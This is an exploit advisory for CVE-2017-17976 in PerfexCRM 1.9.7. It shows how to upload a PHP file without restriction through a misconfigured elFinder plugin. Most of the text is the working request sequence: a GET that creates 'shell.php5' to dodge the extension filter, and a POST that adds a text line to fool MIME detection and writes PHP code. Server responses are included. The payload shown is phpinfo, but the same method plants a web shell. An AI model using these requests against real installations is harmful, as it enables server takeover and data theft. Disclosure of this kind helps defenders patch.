# Exploit Title: PerfexCRM 1.9.7 – Unrestricted php5 File upload
# Exploit Author: Ahmad Mahfouz
# Description: PerfexCRM 1.9.7 is prone to an unrestricted file upload that leads to system takeover via a misconfigured elFinder plugin
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2017-17976
# Version: v1.9.7
# Software Link: https://www.perfexcrm.com/

# bypassing the misconfigured file upload filter with a .php5 file
GET admin/utilities/elfinder_init?cmd=mkfile&name=shell.php5&target=[dir]

JSON Response:
{"added":[{"isowner":false,"mime":"text\/plain","read":1,"write":1,"size":"0","hash":"[XXX]","name":"shell.php5","phash":"[XXXX] "}],"changed":[{"isowner":false,"mime":"directory","read":1,"write":1,"size":0,"hash":"[ XXX]","name":"asa","phash":"[ XXX] ","volumeid":"[XXX]"}]}

# bypass the file-content restriction by adding a TEXT line so the detected MIME type is text
Request
POST /admin/utilities/elfinder_init HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close

cmd=put&target=[folder]&encoding=UTF-8&content=demo newline to represent text mime type <?php phpinfo(); ?>

HTTP/1.1 200 OK
Content-Type: application/json
Connection: close
Content-Length: 167

{"changed":[{"isowner":false,"mime":"text\/plain","read":1,"write":1,"size":"44","hash":"[XXX]","name":"shell.php5","phash":"[XXX]]"}]} |